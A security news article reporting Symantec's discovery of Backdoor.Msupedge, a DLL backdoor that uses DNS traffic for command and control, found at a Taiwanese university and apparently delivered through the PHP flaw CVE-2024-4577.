- “저작권 문제없이 누구나 사용 가능”··· 카카오모빌리티, ‘자율주행 AI 학습용 데이터셋’ 공개
- ‘오셀롯’ 칩으로 양자 컴퓨팅 상용화 5년 앞당기겠다는 AWS 주장에… 전문가들 “아직 갈 길 멀다”
- IBM, 하시코프 인수 절차 완료··· "멀티클라우드 지원 및 AI 자동화 강화"
- "2024년 국내 PC 출하량, 전년 대비 1.1% 감소한 474만 대" 한국IDC
- DirecTV's new no-contract 'Genre Packs' start at $35 - and you can try them for free
New DNS-Based Backdoor Threat Discovered at Taiwanese University
A newly identified security threat utilizing a rarely seen DNS-based communication method has been discovered by threat analysts in an attack targeting a Taiwanese university.
The backdoor, dubbed Backdoor.Msupedge and identified by Symantec, communicates with a command-and-control (C2) server by using DNS traffic, a technique known but infrequently employed by cybercriminals.
Msupedge operates as a dynamic link library (DLL) and has been found installed in specific file paths within the compromised systems. The DLL can execute commands received through DNS queries; a method that not only helps it evade detection but also facilitates stealthy control over infected machines.
Among the most distinctive features of Msupedge is its ability to modify its behavior based on the resolved IP address from the DNS query. Specifically, the third octet of the resolved IP address is used as a switch to determine the command to be executed, ranging from creating processes to downloading files or making the system sleep for a specified duration.
Symantec explained that this new backdoor supports several commands, including:
-
Creating a process via DNS TXT records
-
Downloading files from URLs received through DNS
-
Inducing sleep modes in the infected machine for up to 24 hours
-
Removing temporary files
The initial intrusion is believed to have occurred through the exploitation of a recent PHP vulnerability (CVE-2024-4577), which impacts all PHP versions installed on Windows. This flaw, a CGI argument injection vulnerability, can lead to remote code execution, making it a serious concern for administrators managing Windows-based web servers.
Read more on CVE-2024-4577: Ransomware Surges Annually Despite Law Enforcement Takedowns
“Symantec has seen multiple threat actors scanning for vulnerable systems in recent weeks. To date, we have found no evidence allowing us to attribute this threat and the motive behind the attack remains unknown,” the company wrote.
To protect against this threat, the security firm has included a list of indicators of compromise (IOC) in its latest advisory about Msupedge.
